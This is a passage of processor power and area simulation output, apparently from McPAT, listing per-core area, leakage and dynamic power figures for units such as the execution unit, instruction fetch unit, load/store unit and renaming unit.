'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.360659,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.35265,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.251682,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.57333,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.132192,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0131644,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.135006,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0973591,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.267198,
'Execution Unit/Register Files/Runtime Dynamic': 0.110524,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.357715,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.92171,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.08322,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00118955,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00118955,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00103968,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000404441,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00139857,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481735,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.011277,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0935938,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.95337,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.255997,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.317887,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.46524,
'Instruction Fetch Unit/Runtime Dynamic': 0.683572,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0840345,
'L2/Runtime Dynamic': 0.0183281,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.87329,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.77177,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117639,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117639,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.43106,
'Load Store Unit/Runtime Dynamic': 2.46956,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.290077,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.580154,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.102949,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.104134,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.370159,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0421976,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.706637,
'Memory Management Unit/Runtime Dynamic': 0.146331,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.822,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.461189,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0241191,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.180612,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.665919,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.06693,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0520231,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.24355,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.325332,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.158488,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.255636,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.129036,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.54316,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.131386,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.6277,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0614623,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00664771,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0657428,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0491639,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.127205,
'Execution Unit/Register Files/Runtime Dynamic': 0.0558116,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.15151,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.391515,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.63941,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000857753,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000857753,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000771402,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000311913,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000706243,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00319315,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00735585,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0472625,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.0063,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.137126,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.160525,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.37072,
'Instruction Fetch Unit/Runtime Dynamic': 0.355462,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0353248,
'L2/Runtime Dynamic': 0.00769361,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.00643,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.859182,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0572414,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0572415,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.27674,
'Load Store Unit/Runtime Dynamic': 1.19872,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.141148,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.282296,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0500938,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0505617,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.186921,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.022665,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.429082,
'Memory Management Unit/Runtime Dynamic': 0.0732268,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.329,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.161679,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00911815,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0776089,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.248406,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.52292,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0237353,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221331,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.128895,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.111703,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.180173,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
